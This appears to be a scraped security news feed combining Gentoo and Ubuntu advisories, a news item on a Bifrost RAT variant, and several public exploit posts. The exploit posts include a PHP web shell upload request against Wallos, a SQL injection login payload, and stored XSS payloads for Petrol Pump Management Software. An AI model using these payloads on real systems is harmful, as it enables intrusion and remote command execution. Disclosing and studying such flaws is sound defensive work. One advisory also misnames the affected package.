Gentoo Linux Security Advisory 202403-3 - Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting. Versions greater than or equal to 5.4.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: UltraJSON: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #855689  
       ID: 202403-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in UltraJSON, the worst of  
which could lead to key confusion and value overwriting.

Background  
==========

UltraJSON is an ultra fast JSON encoder and decoder written in pure C  
with bindings for Python 3.8+.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-python/ujson  < 5.4.0       >= 5.4.0

Description  
===========

Affected versions were found to improperly decode certain characters.  
JSON strings that contain escaped surrogate characters not part of a  
proper surrogate pair were decoded incorrectly. Besides corrupting  
strings, this allowed for potential key confusion and value overwriting  
in dictionaries. All users parsing JSON from untrusted sources are  
vulnerable. From version 5.4.0, UltraJSON decodes lone surrogates in the  
same way as the standard library's `json` module does, preserving them  
in the parsed output.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All UltraJSON users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/ujson-5.4.0"

References  
==========

[ 1 ] CVE-2022-31116  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31116  
[ 2 ] CVE-2022-31117  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31117

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-03

Gentoo Linux Security Advisory 202403-2 - Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 3.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Blender: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #834011  
       ID: 202403-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Blender, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Blender is a 3D Creation/Animation/Publishing System.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-gfx/blender  < 3.1.0       >= 3.1.0

Description  
===========

Multiple vulnerabilities have been discovered in Blender. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Blender users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/blender-3.1.0"

References  
==========

[ 1 ] CVE-2022-0544  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0544  
[ 2 ] CVE-2022-0545  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0545  
[ 3 ] CVE-2022-0546  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-02

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-01

Petrol Pump Management System version 1.0 suffers from a remote shell upload vulnerability. This is a variant vector of attack in comparison to the original discovery attributed to SoSPiro in February of 2024.

    # Exploit Title: File Upload Remote Code Execution (RCE) in Petrol PumpManagement Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27747# Description: File Upload vulnerability in Petrol Pump Management Softwarev.1.0 allows an attacker to execute arbitrary code via a crafted payload tothe email Image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the phpinfo.php file in "Image" field5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page6. The content of phpinfo.php file is given below:<?php phpinfo();?># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747

Petrol Pump Management System 1.0 Shell Upload

Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Petrol Pump Management Software 1.0 SQL Injection

Petrol Pump Management Software version 1.0 suffers from multiple cross site scripting vulnerabilities.

    # Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27743# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the Address parameter in the add_invoices.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"4. Fill the payload "<script>alert(0)</script>" in "Address" field5. Stored XSS will be present in "http://localhost/fuelflow/admin/manage_invoices.php" page# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743-----# Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27744# Description: Cross Site Scripting vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the xss.svg file in "Image" field5. Stored XSS will be present in "http://localhost/fuelflow/assets/images/xss.svg" page6. The content of the xss.svg file is given below:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"stroke="#004400"/>  <script type="text/javascript">    alert("XSS by Shubham Pandey");  </script></svg># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744

Petrol Pump Management Software 1.0 Cross Site Scripting

By Waqas
Bifrost RAT, also known as Bifrose, was originally identified two decades ago in 2004.
This is a post from HackRead.com Read the original post: New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

The latest version of Bifrost RAT employs sophisticated techniques including typosquatting, to avoid detection and complicate efforts to trace its origins.

Cybersecurity experts at Palo Alto Networks’ Unit 42 have uncovered a new cybersecurity threat: a new variant of the Bifrost RAT (also known as Bifrose) targeting Linux systems. This variant, utilizing a tricky domain named download.vmfare(.)com, is designed to evade detection and compromise targeted systems.

The malicious domain bears a not-so-easy-to-distinguish resemblance to a legitimate VMware domain, with the only difference being the substitution of the letter “F” for the “W” in the domain: VM**w**are becomes VM**f**are. For your information, VMware is a leading provider of virtualization and cloud computing software and services.

This type of attack is called a **typosquatting attack** in which malicious actors register domain names similar to popular ones, relying on users making typing errors to visit their sites, often for phishing or malware distribution purposes. For example, “**It’s Google.com, not ɢoogle.com**.”

VirusTotal score for the malicious domain (screenshot: Palo Alto Networks’ Unit 42)

Bifrost, a remote access Trojan (RAT) dating back to 2004, is notorious for its ability to hide within systems, inject malicious code into legitimate processes, and establish covert communication channels with external servers. This allows attackers to steal sensitive data with ease.

The latest version of Bifrost, as detailed by researchers in their technical **blog post**, employs sophisticated techniques to avoid detection and complicate efforts to trace its origins. By encrypting collected data using RC4 encryption, and the aforementioned domain with a deceptive name, the malware makes it challenging for security experts to thwart its activities.

Additionally, the malware’s recent deployment on a server hosting an ARM version hints at an expansion of its targets.

Analysis of the malware’s code reveals intricate manoeuvres to establish connections and gather data, showcasing its advanced capabilities in evading detection. Palo Alto Networks detected over 100 instances of Bifrost activity in recent months, signalling a critical need for enhanced security measures.

To safeguard against Bifrost attacks, Unit 42 researchers recommend a multi-faceted approach including regular system updates, strong access controls, deployment of endpoint security solutions, and vigilant monitoring of network activity.

1.  New Linux Malware “Migo” Exploits Redis for Cryptojacking
2.  Free Download Manager Site Pushed Linux Password Stealer
3.  Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack
4.  Hamas Hackers Hit Israelis with New BiBi-Linux Wiper Malware
5.  Mirai-based NoaBot Botnet Hits Linux Systems with Cryptominer

New Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain

Ubuntu Security Notice 6653-3 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6653-3February 29, 2024linux-lowlatency vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-lowlatency: Linux low latency kernelDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-6915)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-97-lowlatency  5.15.0-97.107   linux-image-5.15.0-97-lowlatency-64k  5.15.0-97.107   linux-image-lowlatency          5.15.0.97.95   linux-image-lowlatency-64k      5.15.0.97.95After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6653-3   https://ubuntu.com/security/notices/USN-6653-1   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,   CVE-2024-0646Package Information:   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-97.107

Ubuntu Security Notice USN-6653-3

Ubuntu Security Notice 6651-3 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6651-3February 29, 2024linux-starfive-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-starfive-6.5: Linux kernel for StarFive processorsDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-6915)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Jann Horn discovered that the io_uring subsystem in the Linux kernel didnot properly handle the release of certain buffer rings. A local attackercould use this to cause a denial of service (system crash) or possiblyexecute arbitrary code. (CVE-2024-0582)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.5.0-1008-starfive  6.5.0-1008.9~22.04.1   linux-image-starfive            6.5.0.1008.9~22.04.3After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6651-3   https://ubuntu.com/security/notices/USN-6651-1   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,   CVE-2024-0582, CVE-2024-0646Package Information:   https://launchpad.net/ubuntu/+source/linux-starfive-6.5/6.5.0-1008.9~22.04.1

Tag

#linux